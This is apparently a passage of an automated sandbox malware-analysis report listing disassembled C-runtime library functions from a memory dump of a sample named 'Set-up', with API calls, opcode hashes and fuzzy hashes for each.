                                                                                              • API String ID: 4257252171-0
                                                                                              • Opcode ID: baea90c83870f3f046bacdb5ac5e35e9ab1b5cdf5b203b6b5271f685a67e949d
                                                                                              • Instruction ID: 0d7d0929d2eb7d391f9836f54392e17b3585f5f98ef5e3fc6274ee688e7b74da
                                                                                              • Opcode Fuzzy Hash: baea90c83870f3f046bacdb5ac5e35e9ab1b5cdf5b203b6b5271f685a67e949d
                                                                                              • Instruction Fuzzy Hash: 1FF05E72100144BBDB21AFB4DC4AE9F7BE8EF4A384B110825F619C7550E739E600CBA2
                                                                                              Function 6BB6A745 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB6A780
                                                                                              • __doserrno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90417
                                                                                              • _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9041F
                                                                                              • _errno.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB90432
                                                                                              • _invalid_parameter_noinfo.MSVCR100(?,6BBD84F4,?,?,?,?,?,?,6BB8FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB9043D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2315031519-0
                                                                                              • Opcode ID: eaf6e39f7c8dc328b81591f8cbbbd7bce3a88871f574d5af43e5ff42c8fd5bd3
                                                                                              • Instruction ID: 45f27c94a9463f2850e7896965f82793c1dc3f4602fd01be09155f744094bfc0
                                                                                              • Opcode Fuzzy Hash: eaf6e39f7c8dc328b81591f8cbbbd7bce3a88871f574d5af43e5ff42c8fd5bd3
                                                                                              • Instruction Fuzzy Hash: 19F09A312442848BDB1A9FB8D441B3877B09F833A9F5102A9D5288B6D1EBBCDC428E91
                                                                                              Function 6BBA007C Relevance: 7.5, APIs: 5, Instructions: 32memorythreadCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B
                                                                                              • TlsAlloc.KERNEL32 ref: 6BBA009D
                                                                                              • GetLastError.KERNEL32 ref: 6BBA00AD
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BBA00C6
                                                                                              • _CxxThrowException.MSVCR100(00000000,6BBFFEB4,00000000), ref: 6BBA00D5
                                                                                              • Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6BBA00DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
                                                                                              • String ID:
                                                                                              • API String ID: 3767078539-0
                                                                                              • Opcode ID: 2f1bd6bf4f2a92aaa44e163997a43d1a6f1d6f4dc27c751f59a5e15f2511c8c6
                                                                                              • Instruction ID: 8697f152852e4e6aca1a01109662287cf8eacb5595dbd2ef55576a18304f49a7
                                                                                              • Opcode Fuzzy Hash: 2f1bd6bf4f2a92aaa44e163997a43d1a6f1d6f4dc27c751f59a5e15f2511c8c6
                                                                                              • Instruction Fuzzy Hash: 5BF0E2328152814ACB206EB0880766E3798EB42324F184779E475C20C0EB3DC5049A62
                                                                                              Function 6BB5442D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 6BB544BD
                                                                                                • Part of subcall function 6BB78900: __87except.LIBCMT ref: 6BB7893B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorHandling__87except__start
                                                                                              • String ID: pow
                                                                                              • API String ID: 2905807303-2276729525
                                                                                              • Opcode ID: 09d655443bcf6f0e771496def2a717ec8cf49ebb38911fa5d99ba9d26c45b6e5
                                                                                              • Instruction ID: f7af7bb49e7bd29d29f96f9688c95d6b191ed68634d590df990fbec8383ed75b
                                                                                              • Opcode Fuzzy Hash: 09d655443bcf6f0e771496def2a717ec8cf49ebb38911fa5d99ba9d26c45b6e5
                                                                                              • Instruction Fuzzy Hash: 8851E473E4C1C297D7016E28D95236E3BE8EB42B54F104D99E4E58229CEF3DC8B58A47
                                                                                              Function 6BB9D0C1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6BB9D1B0
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6BB9D1C3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: $$,
                                                                                              • API String ID: 2102423945-53852779
                                                                                              • Opcode ID: 78317c09046f200d96166056200ee0860819ba3a296969d6b915bb36821915cd
                                                                                              • Instruction ID: 22cba477b4cda45e3e9d277268880672d35012e38ac959b884a0db92a91b6f21
                                                                                              • Opcode Fuzzy Hash: 78317c09046f200d96166056200ee0860819ba3a296969d6b915bb36821915cd
                                                                                              • Instruction Fuzzy Hash: AC41A032E442A8AFDB11BFB9FC85AAD7BB4EF0A354F104475E805A7200D7799D418BA1
                                                                                              Function 6BB64202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_wcslen
                                                                                              • String ID: I
                                                                                              • API String ID: 3151729805-3707901625
                                                                                              • Opcode ID: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
                                                                                              • Instruction ID: b12129bf6b66e052067ce4a834855f661a04fb20fee707717901c4a31a504663
                                                                                              • Opcode Fuzzy Hash: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
                                                                                              • Instruction Fuzzy Hash: 59014F72C00699ABDF008FA5DC01AAE7BB5AF44768F104A15E534A61D0E77D86128FA9
                                                                                              Function 6BB70A05 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo_strlen
                                                                                              • String ID: I
                                                                                              • API String ID: 1245117036-3707901625
                                                                                              • Opcode ID: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
                                                                                              • Instruction ID: 6baa25d81535279bbda02c5b8613f99e69ab0be3902ed2da7d106ce15cdaf3d2
                                                                                              • Opcode Fuzzy Hash: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
                                                                                              • Instruction Fuzzy Hash: 0B018F71C0025AABDF009FA5C801AEE7BB5FF44728F10461AF524A6280D779C511CFA9
                                                                                              Function 6BB646C1 Relevance: 6.3, APIs: 4, Instructions: 262COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
                                                                                              • Instruction ID: 76c25a9611c6130a795b7430897c9e137f704757dc27385bcd252bff13386079
                                                                                              • Opcode Fuzzy Hash: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
                                                                                              • Instruction Fuzzy Hash: B9914A35A08AE99BCF058F6898A01EE7B75EF9B385F144099EC5497344F738DD10CBA1
                                                                                              Function 6BB6B73E Relevance: 6.2, APIs: 4, Instructions: 160COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6BB6B7A7
                                                                                              • GetCPInfo.KERNEL32(00000000,?), ref: 6BB6B7BA
                                                                                              • _memset.LIBCMT(0000001D,00000000,00000101), ref: 6BB6B7D2
                                                                                              • _memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6BB8A8ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 1608968462-0
                                                                                              • Opcode ID: 2319d32c55e428a8e9f8638d4f2f01369ca0a7b325b088f2eba3d0857061ee01
                                                                                              • Instruction ID: c8f1e2e57777fa3399a59d9bc4b7aeccdd0029c2f19e78d0e8f565ec1bc35501
                                                                                              • Opcode Fuzzy Hash: 2319d32c55e428a8e9f8638d4f2f01369ca0a7b325b088f2eba3d0857061ee01
                                                                                              • Instruction Fuzzy Hash: 475101319042958BDF259F69C8812BEBBB0EF45704F0984AAD8A59B282D77DC942CF90
                                                                                              Function 6BB98F20 Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,6BBA0AF2), ref: 6BB98FFA
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB9900D
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,6BBA0AF2), ref: 6BB99014
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BBA0AF2), ref: 6BB9905F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4058414921-0
                                                                                              • Opcode ID: 15b3ec688518d8b3ee56ca794fcd6c548ef263227db7ef19d203841218a4e1f8
                                                                                              • Instruction ID: f1eaf242421b828c7daa3172c6731d421c6e8e8f5d752ee8c0cee44aac1de02e
                                                                                              • Opcode Fuzzy Hash: 15b3ec688518d8b3ee56ca794fcd6c548ef263227db7ef19d203841218a4e1f8
                                                                                              • Instruction Fuzzy Hash: 75517F30508341CFE715DF28D981B1AB7E0FF86364F108A6DE5AA8B695E734E845CB92
                                                                                              Function 6BB73D0D Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$_invalid_parameter_noinfo_mbsdec
                                                                                              • String ID:
                                                                                              • API String ID: 1897159254-0
                                                                                              • Opcode ID: ac2fc793a16b45e7da48b9635dc514201799cdcd9146e502d463fede157ae603
                                                                                              • Instruction ID: 252e66e57073e07402c216005aac6a46a3a493f0b5d54c9f54a31af38cbdd0eb
                                                                                              • Opcode Fuzzy Hash: ac2fc793a16b45e7da48b9635dc514201799cdcd9146e502d463fede157ae603
                                                                                              • Instruction Fuzzy Hash: 7531E532A4C2C49FD732AF2894906AD7BA1DB47750B6544F8E8F14F311D2389C8797A1
                                                                                              Function 6BB96CDB Relevance: 6.1, APIs: 4, Instructions: 123COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000), ref: 6BB96DB6
                                                                                              • _memset.LIBCMT(00000000,00000000,?,00000000,00000000), ref: 6BB96DC9
                                                                                              • ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,00000000), ref: 6BB96DD0
                                                                                              • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,00000000), ref: 6BB96E1B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
                                                                                              • String ID:
                                                                                              • API String ID: 4058414921-0
                                                                                              • Opcode ID: 5b5309c027b6e87c3f1c50d7832de5d62f0eeda551c075872f40751f01c52b5d
                                                                                              • Instruction ID: a437a984aea7e692b3fd347095a5ae7c644db47e482f47a3b0130c0b1b550ac6
                                                                                              • Opcode Fuzzy Hash: 5b5309c027b6e87c3f1c50d7832de5d62f0eeda551c075872f40751f01c52b5d
                                                                                              • Instruction Fuzzy Hash: 83517C30508781CFD715DF29D580B16B7E0FF8A724F108AADE5AA8B295D734E845CB92
                                                                                              Function 6BB619A5 Relevance: 6.1, APIs: 4, Instructions: 105COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6BB692C2
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6BB692E8
                                                                                              • _errno.MSVCR100(?,?,?,?), ref: 6BB8A17D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_errno_isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 911568377-0
                                                                                              • Opcode ID: 37e8d89fbd002ea842d931cdfcb9818a7f1aaeecff82687da24f742d34f1c04c
                                                                                              • Instruction ID: 4591b9be406879bf1cbdff3553349e786e4e80537449cff988a7bea643f1db79
                                                                                              • Opcode Fuzzy Hash: 37e8d89fbd002ea842d931cdfcb9818a7f1aaeecff82687da24f742d34f1c04c
                                                                                              • Instruction Fuzzy Hash: F331BF32A042DAEFDB01DFA8C880AAE3BB1FF02350B1445A9E4658B1D0E735DD41CF51
                                                                                              Function 6BB6EF9C Relevance: 6.1, APIs: 4, Instructions: 99COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?,7FFFFFFF,00000000), ref: 6BB8A2E4
                                                                                              • _isleadbyte_l.MSVCR100(00000008,00000000,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A320
                                                                                              • __crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,?,7FFFFFFF,00000000,00000000,00000000,00000000,?), ref: 6BB8A36D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: String__crt__isctype_l_isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 150061899-0
                                                                                              • Opcode ID: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
                                                                                              • Instruction ID: beefc54c3db96c9b79e416258a55e72efad7bb29737a290296dbb7ef0c03338e
                                                                                              • Opcode Fuzzy Hash: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
                                                                                              • Instruction Fuzzy Hash: 2631B631908289AFEB11CBA8C886FEE7FB4EB01358F0440A9E5549F1C1E779DA45CF61
                                                                                              Function 6BB5F6A8 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _CallDestructExceptionObject.LIBCMT ref: 6BB5F721
                                                                                              • _global_unwind2.MSVCR100(?), ref: 6BB5F72D
                                                                                              • _local_unwind2.MSVCR100(?,?), ref: 6BB5F73A
                                                                                              • _local_unwind2.MSVCR100(?,000000FF), ref: 6BB5F790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _local_unwind2$CallDestructExceptionObject_global_unwind2
                                                                                              • String ID:
                                                                                              • API String ID: 277650583-0
                                                                                              • Opcode ID: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
                                                                                              • Instruction ID: 367328195bb02d07f4f286f3f033d05ed29eb00587aca427d51c6a26aeed2d9d
                                                                                              • Opcode Fuzzy Hash: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
                                                                                              • Instruction Fuzzy Hash: 9131C773A00248DBCB00DF68DC819AEF7A9FB04364F4581A5ED199B245DB39FA25C7E1
                                                                                              Function 6BB96508 Relevance: 6.1, APIs: 4, Instructions: 91sleepCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BB96670,0000002C,6BB969F9), ref: 6BB9652C
                                                                                                • Part of subcall function 6BB96E51: _SpinWait.LIBCMT(00000FA0,00000FA0,?,6BB9AD21,00000000), ref: 6BB96E6B
                                                                                              • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB96572
                                                                                              • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB965C2
                                                                                              • Sleep.KERNEL32(00000001), ref: 6BB965E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Spin$AcquireLock@details@ReaderWrite@_Writer$A@@details@Once@?$_SleepWaitWait@$0
                                                                                              • String ID:
                                                                                              • API String ID: 947146699-0
                                                                                              • Opcode ID: 8ca508ae4232d111353334d928d2d744e637e3816bb1a0aab12f4771589f3477
                                                                                              • Instruction ID: 8441133dff5408c16b82cbe846a7cd28a790254690d0ebd15757ef934ab7fbc9
                                                                                              • Opcode Fuzzy Hash: 8ca508ae4232d111353334d928d2d744e637e3816bb1a0aab12f4771589f3477
                                                                                              • Instruction Fuzzy Hash: 9C418871A047888FDB10EFA8E9457CEBBF0AF06318F04016DD452A7285D7B9E904CBE4
                                                                                              Function 6BB6489C Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
